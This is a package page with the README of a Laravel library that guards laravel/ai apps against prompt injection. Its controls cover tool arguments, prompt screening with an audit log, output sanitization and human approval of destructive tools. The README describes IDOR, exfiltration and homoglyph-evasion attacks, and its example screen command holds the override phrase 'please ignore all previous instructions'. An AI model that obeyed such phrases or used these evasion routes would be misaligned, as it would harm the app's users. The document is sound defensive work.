padosoft/laravel-ai-guardrails
Composer 安装命令:
composer require padosoft/laravel-ai-guardrails
包简介
Deterministic prompt-injection guardrails for laravel/ai: tool firewall, input screening + injection audit, untrusted-output sanitization, and a HITL approval bridge.
README 文档
README
laravel-ai-guardrails
Deterministic, offline-first prompt-injection guardrails for laravel/ai.
Four composable controls that treat everything the model touches — its tool arguments, its prompts, and its output — as untrusted.
Table of Contents
- Why it exists
- What makes it different
- The four controls
- Quick start
- PHP surface
- Wiring the agent middleware
- Artisan surface
- HTTP API surface (admin)
- Configuration
- Composing laravel-flow & laravel-pii-redactor
- The append-only injection audit
- Domain events
- Security & threat model
- Known limitations
- Testing
- Part of the Padosoft AI suite
- License
Why it exists
laravel/ai makes it trivial to give a model tools (refund an order, delete a record, send an email) and to feed it untrusted user input. That is exactly where prompt injection lives:
- The model can be talked into calling a tool with someone else's
user_id(confused-deputy / IDOR). - A crafted prompt can make it ignore its instructions or exfiltrate secrets.
- Its output — rendered in your UI — can carry stored-XSS, markdown data-exfiltration links, or leaked PII.
- It can decide, on its own, to pull the trigger on a destructive action.
laravel-ai-guardrails closes that gap with four deterministic, offline, unit-testable controls. No second LLM call, no network, no non-determinism — the audit trail is the product, not a regex you have to trust.
📚 Full documentation: doc.laravel-ai-guardrails.padosoft.com — guides, the four controls in depth, architecture & ADRs, configuration reference, and the HTTP/MCP surfaces.
What makes it different
- Untrusted-input posture, everywhere. Tool arguments, prompts, and model output are all treated as hostile.
- Deterministic & offline. Controls A–C never call a model; every decision is reproducible and testable.
- Fails closed. A PCRE error, a tampered flow record, an unresolved engine — every failure path blocks rather than silently allows.
- Append-only audit. Every screening attempt (blocked and allowed) is logged to an immutable store. The model never updates or deletes it.
- Composes, doesn't reinvent. Optional
padosoft/laravel-flowfor human approval andpadosoft/laravel-pii-redactorfor PII — with graceful degradation when absent. - Every feature is a toggle, tested in both states, with a master kill-switch that degrades the whole package to pass-through.
The four controls
| Control | What it does | Threat it closes | |
|---|---|---|---|
| A | Tool Firewall | Re-scopes model-chosen owner keys (user_id, …) to the authenticated principal server-side and validates every argument against the tool's own JSON schema. |
Confused-deputy / IDOR via model-chosen arguments |
| B | Input Screening + Audit | Normalizes the prompt (defeating homoglyph / zero-width / case evasion), screens it, refuses before the model runs, and append-only-logs every attempt. | Jailbreak / exfiltration prompts |
| C | Output Handler | Treats the response as untrusted: escapes HTML, neutralizes markdown link/image exfil vectors, validates structured output, and redacts PII. | Stored-XSS / data-exfil / PII leakage in model output |
| D | HITL Bridge | Routes destructive tool calls (refund/delete/email) through laravel-flow's approvalGate() — a human approves before the action runs. |
Unauthorized destructive actions |
Quick start
Junior-proof. Five steps.
1. Install
composer require padosoft/laravel-ai-guardrails
2. Publish the config
php artisan vendor:publish --tag=ai-guardrails-config
3. (Optional) Publish + run the audit migration — only if you want database-backed audit:
php artisan vendor:publish --tag=ai-guardrails-migrations php artisan migrate
then set AI_GUARDRAILS_AUDIT_STORE=database in your .env.
4. Guard a tool call (Control A) in your app:
use Padosoft\AiGuardrails\Facades\AiGuardrails; $safeTool = AiGuardrails::guard($refundTool); // re-scopes owner keys + validates args
5. Screen a prompt or sanitize output anywhere:
$verdict = AiGuardrails::screen($userPrompt); // ->blocked, ->ruleId, ->refusalMessage $clean = AiGuardrails::sanitize($modelOutput); // HTML/markdown sanitized + PII redacted
That's it. Add the agent middleware (below) to screen prompts and sanitize output automatically.
PHP surface
Everything is reachable from the AiGuardrails facade:
use Padosoft\AiGuardrails\Facades\AiGuardrails; AiGuardrails::screen(string $prompt): ScreenVerdict; // Control B AiGuardrails::sanitize(string $text): string; // Control C AiGuardrails::guard(Tool $tool, ?Closure $principalResolver = null): Tool; // Control A AiGuardrails::routeForApproval(Tool $tool, string $toolName, ?Closure $principalResolver = null): Tool; // Control D AiGuardrails::isDestructive(string $toolName): bool; AiGuardrails::validateStructured(array $output, array $schema, bool $rejectUnknown = false): array; // Control C
Wiring the agent middleware
Declare the input + output middleware on your agent (they implement laravel/ai's middleware contract):
use Padosoft\AiGuardrails\Screening\GuardrailInputMiddleware; use Padosoft\AiGuardrails\Output\GuardrailOutputMiddleware; use Laravel\Ai\Contracts\HasMiddleware; final class SupportAgent implements Agent, HasMiddleware { public function middleware(): array { return [ app(GuardrailInputMiddleware::class), // screens + refuses + audits before the model app(GuardrailOutputMiddleware::class), // sanitizes $response->text + structured fields after ]; } }
GuardrailInputMiddleware refuses without ever invoking the model when a prompt is blocked, and audits every attempt. GuardrailOutputMiddleware rewrites the response text (and the structured-output fields) in place — tool calls are left to Controls A/D.
Artisan surface
# Screen a prompt (exits non-zero when blocked); reads STDIN if no argument php artisan ai-guardrails:screen "please ignore all previous instructions" # Sanitize + redact a text blob php artisan ai-guardrails:sanitize "<script>steal()</script> " # List recent injection-audit attempts (blocked and allowed) php artisan ai-guardrails:audit --limit=50 # Apply the GDPR retention strategy to the audit table (actor-audited; the only sanctioned erasure path) php artisan ai-guardrails:purge --strategy=anonymize --days=365 --actor="ops:nightly" php artisan ai-guardrails:purge --dry-run # report what would be affected, change nothing
HTTP API surface (admin)
A read/config HTTP API for an admin panel (e.g. laravel-ai-guardrails-admin). It is default-OFF — set api.enabled = true and supply a middleware stack via api.middleware. If api.enabled is true but api.middleware resolves to an empty list, the service provider throws a RuntimeException at boot (fail-closed against an accidentally open surface) — but it does not inspect what that middleware does: you must include your own authentication/authorization middleware — these endpoints expose audit data and let an operator change security settings. Routes are mounted under the api.prefix (default ai-guardrails/api) and named ai-guardrails.api.*.
Envelope. Successful (and handled-error, e.g. 404/409/422-via-controller) responses are enveloped as { "schema_version": "ai-guardrails.api.v1", "schema": "ai-guardrails.api.v1.<endpoint>", "data": { … } } — schema_version is the contract version a client pins against; schema is a per-endpoint discriminator. (Mirrors the padosoft-eval-harness ReportApi house style.) Exception: framework-level validation failures (a malformed PUT /settings body) return Laravel's standard 422 validation JSON, not the envelope.
| Method | Path | Route name | schema |
Backing store / toggle |
|---|---|---|---|---|
| GET | /overview |
…overview |
…v1.overview |
aggregates each control's enabled + effective mode (enforce/monitor/off) + 24h injection counts + the active ruleset_version |
| GET | /audit |
…audit.index |
…v1.audit-list |
audit.store (null | array | database) — keyset paginated (cursor), filters blocked/rule_id/principal_id/q/from/to |
| GET | /audit/{id} |
…audit.show |
…v1.audit-detail |
full prompt + matched_span; 404 on unknown/non-numeric id |
| GET | /audit/trend |
…audit.trend |
…v1.audit-trend |
per-UTC-day SQL GROUP BY (dialect-safe); 30-day default window |
| GET | /firewall |
…firewall.index |
…v1.firewall |
firewall_log.store — Control A rejections, keyset paginated |
| GET | /output/stats |
…output.stats |
…v1.output-stats |
output_stats.store — per-kind counts, 30-day default window |
| GET | /approvals |
…approvals.index |
…v1.approval-list |
Control D pending approvals (via laravel-flow); empty when HITL unavailable |
| POST | /approvals/{token}/approve |
…approvals.approve |
…v1.approval-decision |
resumes the parked tool; actor principal derived server-side |
| POST | /approvals/{token}/reject |
…approvals.reject |
…v1.approval-decision |
rejects the parked tool |
| GET | /settings |
…settings.show |
…v1.settings |
settings.store (config | database) — effective overridable settings |
| PUT | /settings |
…settings.update |
…v1.settings |
persists allow-listed, type-validated overrides; appends a change record + dispatches SettingsChanged |
| GET | /settings/changes |
…settings.changes |
…v1.settings-changes |
settings_audit.store (null | array | database) — append-only WHO/WHAT change log |
| POST | /try/screen |
…try.screen |
…v1.try-screen |
sandbox: screen a prompt (no persistence) |
| POST | /try/sanitize |
…try.sanitize |
…v1.try-sanitize |
sandbox: sanitize a text blob (no persistence) |
Append-only stores. The audit, firewall, output-stat, and settings-change tables are immutable (the model + builder throw on update/delete). GET /settings is current-state and mutable; PUT /settings only accepts keys on the settings.overridable allow-list and type-validates each value (booleans, enums, bounded strings) — unknown keys are dropped, malformed values are rejected 422. When settings.store = database, saved overrides are overlaid onto the live config at boot so they actually take effect on the controls (fail-safe: a corrupt/null/type-mismatched row keeps the file default). Every effective change (before ≠ after) is recorded to the settings_audit store with the server-derived actor (never client-supplied) and surfaced by GET /settings/changes.
Configuration
Every behaviour is a config toggle (config/ai-guardrails.php). The four controls are on by default (that is the point); the HITL bridge (hitl.enabled) and the HTTP API (api.enabled) are default-OFF because they need optional dependencies / explicit opt-in. A master kill-switch sits on top.
| Key | Default | Purpose |
|---|---|---|
enabled |
true |
Master kill-switch — off degrades every control to pass-through. |
tool_firewall.owner_keys |
user_id, owner_id, account_id, customer_id |
Argument keys the model may never choose (overwritten server-side). |
tool_firewall.reject_unknown_arguments |
true |
Reject arguments not declared in the tool schema. |
input_screen.patterns |
(4 built-in) | ruleId => PCRE pattern — the audit is the value, not the list. |
normalization.* |
on | NFKC, zero-width strip, casefold, max_prompt_length. |
pattern_safety.on_match_error |
closed |
closed = block on a PCRE error, open = skip the rule. |
output_handler.html_mode |
escape |
escape (default) or allowlist (keep a safe inline-tag set). |
output_handler.redact_pii |
true |
Redact PII via laravel-pii-redactor when present. |
hitl.enabled |
false |
Enable the HITL approval bridge (needs laravel-flow). |
hitl.destructive_tools |
refund, delete, send_email |
Tool names treated as destructive. |
hitl.fallback |
deny |
When approval is unavailable: deny (refuse) or pass (execute). |
audit.store |
'null' |
'null' | 'array' | 'database' (string tokens). |
tool_authorization.enabled |
false |
Gate tool use behind a Laravel Gate ability (fail-closed) — separate from owner-key re-scoping. |
tool_authorization.ability |
ai-guardrails:use-tool |
The Gate ability checked (with the tool class) before a guarded tool runs. |
tool_authorization.owner_key_depth |
top_level |
recursive re-scopes owner keys at any nesting depth; top_level only at the top. |
api.enabled |
false |
The default-OFF HTTP admin API surface. |
Tool authorization (Control A+)
Owner-key re-scoping stops the model acting on another user's resource — it does not decide whether the principal may use the tool at all. Enable tool_authorization.enabled and define the Gate ability to add that second layer:
use Illuminate\Support\Facades\Gate; Gate::define('ai-guardrails:use-tool', fn ($user, string $toolClass) => $user->mayUse($toolClass));
AiGuardrails::guard() then composes authorize → re-scope → validate → run; a denial throws ToolNotAuthorized. It fails closed: an undefined ability, an unauthenticated user, or a throwing policy all deny.
The
modes,audit_hygiene, andretentionconfig blocks are documented in their own sections above.
Composing laravel-flow & laravel-pii-redactor
Both are optional (suggest). The package degrades gracefully:
composer require padosoft/laravel-flow # enables Control D (human approval) composer require padosoft/laravel-pii-redactor # enables PII redaction in Control C
When a package is absent, class_exists guards bind null-object implementations, and the boundary is enforced by an architecture test (flow is referenced only in src/Hitl, pii-redactor + HTMLPurifier only in src/Output, and laravel/mcp only in src/Mcp).
MCP surface
A fourth surface (after PHP, Artisan, HTTP API): expose the guardrails to AI clients via laravel/mcp. Default-OFF — install the package and set mcp.enabled = true:
composer require laravel/mcp # config/ai-guardrails.php → 'mcp' => ['enabled' => true] php artisan mcp:start ai-guardrails # local (stdio) server
Registered under the handle ai-guardrails with three tools: screen_prompt (Control B verdict), sanitize_output (Control C clean), and recent_injection_audit (read the append-only log). The laravel/mcp reference is confined to src/Mcp (architecture test).
HITL setup (Control D)
Control D needs laravel-flow installed and its tables migrated. Two commands make that turnkey and verifiable:
# Run laravel-flow's migrations (flow_runs / flow_approvals) straight from vendor — scoped, idempotent php artisan ai-guardrails:hitl-install # Diagnose the setup: flow installed? persistence on? tables present? hitl + master enabled? php artisan ai-guardrails:hitl-status
Then set LARAVEL_FLOW_PERSISTENCE_ENABLED=true and AI_GUARDRAILS_HITL_ENABLED=true. hitl-status exits non-zero (and prints exactly what is missing) until HITL can actually gate a destructive call.
The append-only injection audit
The audit is the product value of Control B. Every screening attempt — blocked and allowed — is appended to an immutable store. The Eloquent model and its query builder throw on update / delete / upsert / touch / increment / truncate; the table has no updated_at. Timestamps are stored in UTC.
Data hygiene (audit_hygiene.prompt_storage). Because the table captures raw prompts, the stored prompt is transformed before persistence: redact (default — composes laravel-pii-redactor), hash (sha256:…, correlate without keeping content), truncate (first truncate_at code points), or raw. Hygiene is applied at the store boundary so every write path is covered; domain events still carry the raw prompt in-process.
Retention / erasure (retention.strategy). GDPR erasure on an append-only table goes through the sanctioned, actor-audited ai-guardrails:purge command — the only place rows leave the table. anonymize nulls the prompt + principal of rows older than retention.days, purge hard-deletes them, keep retains. Every run logs the actor, strategy, cutoff, and affected-row count.
Domain events
Every guardrail decision dispatches a domain event from the same code path that writes the audit / stat record, so you can wire SIEM, Slack, or PagerDuty with a single listener. Events are gated by events.enabled (default on); set it to false to silence them without touching the controls.
| Event | Dispatched when | $enforced |
|---|---|---|
Padosoft\AiGuardrails\Events\InjectionBlocked |
Control B refused a prompt (enforce) | n/a — separate class |
Padosoft\AiGuardrails\Events\InjectionObserved |
Control B detected an injection but passed it through (monitor) | n/a — separate class |
Padosoft\AiGuardrails\Events\ToolArgumentRejected |
Control A found owner-key / schema violations in a tool call | true = call blocked; false = monitor, call proceeded |
Padosoft\AiGuardrails\Events\DestructiveToolRouted |
Control D parked a destructive call for human approval (carries the non-secret run reference only) | n/a — enforce only |
Padosoft\AiGuardrails\Events\OutputSanitized |
Control C neutralised HTML / markdown / structured / PII in a response (one event per response, deduped kinds) | true = text rewritten; false = monitor, text unchanged |
In monitor mode the Observed/Rejected/Sanitized events still fire. The $enforced property on ToolArgumentRejected and OutputSanitized encodes the enforcement decision directly in the payload — listeners do not need to read the live config to distinguish a real block from a shadow observation.
Security note —
InjectionBlocked/InjectionObservedcarry the raw prompt text (via$attempt->prompt). If you ship these events to an external webhook (Slack, PagerDuty, SIEM), be aware that the payload may contain PII or sensitive input. Extract only the fields you need (ruleId,blocked,occurredAt) rather than forwarding the fullInjectionAttemptobject.
Security & threat model
| Control | Untrusted surface | Posture |
|---|---|---|
| A | model-chosen tool arguments | re-scope owner keys server-side + schema-validate; re-scoping is not authorization |
| B | user prompts | normalize → screen → refuse pre-model → append-only audit; fail closed on PCRE errors |
| C | model output (text + structured fields) | escape HTML / defang markdown & URI exfil vectors / validate structure / redact PII |
| D | destructive tool calls | human-gated via approvalGate(); the plain-text token is never returned to the model |
Every failure path fails closed. The master kill-switch and per-control toggles are tested in both states.
Known limitations
- Control C rewrites
$response->textand structured string fields; the model'stoolCallsare governed by Controls A/D and are not sanitized by default. An opt-inoutput_handler.sanitize_tool_callsflag (default off) adds a defense-in-depth pass that cleans the string leaves of tool-call arguments — enable it only when those arguments are rendered/logged, since rewriting them could otherwise alter a legitimate call. - Cross-script homoglyphs are folded to a Latin skeleton before matching via a curated confusables map (
normalization.fold_confusables, default on) — Cyrillicа/о/е…, Greekο/α/ρ…. It is a high-value curated subset, not the full Unicode confusables data, so an exotic look-alike outside the map can still slip through; extendConfusablesFolderfor a wider threat model. - The HTML
allowlistmode uses HTMLPurifier whenezyang/htmlpurifieris installed (robust parsing of malformed / entity-encoded / mutation-XSS markup), and gracefully falls back to the built-instrip_tagsallowlist when it is absent.escapemode is unchanged. - Control D's flow persistence (approval tokens, resume) is provided by the host's
laravel-flowinstall — made turnkey byai-guardrails:hitl-installand verifiable byai-guardrails:hitl-status(see HITL setup).
Testing
composer install
vendor/bin/phpunit # Unit + Feature + Architecture
vendor/bin/pint --test
vendor/bin/phpstan analyse --memory-limit=512M
CI runs the matrix PHP 8.3 / 8.4 / 8.5 × Laravel 13: composer validate → pint → phpstan (level 8) → phpunit.
Part of the Padosoft AI suite
laravel-ai-guardrails pairs with laravel-ai-guardrails-admin (a React control plane for the audit trail, firewall posture, output stats, and approval queue), and composes padosoft/laravel-flow and padosoft/laravel-pii-redactor.
License
Apache-2.0 © Padosoft s.r.l. See LICENSE.
统计信息
- 总下载量: 0
- 月度下载量: 0
- 日度下载量: 0
- 收藏数: 0
- 点击次数: 2
- 依赖项目数: 0
- 推荐数: 0
其他信息
- 授权协议: Apache-2.0
- 更新时间: 2026-06-18
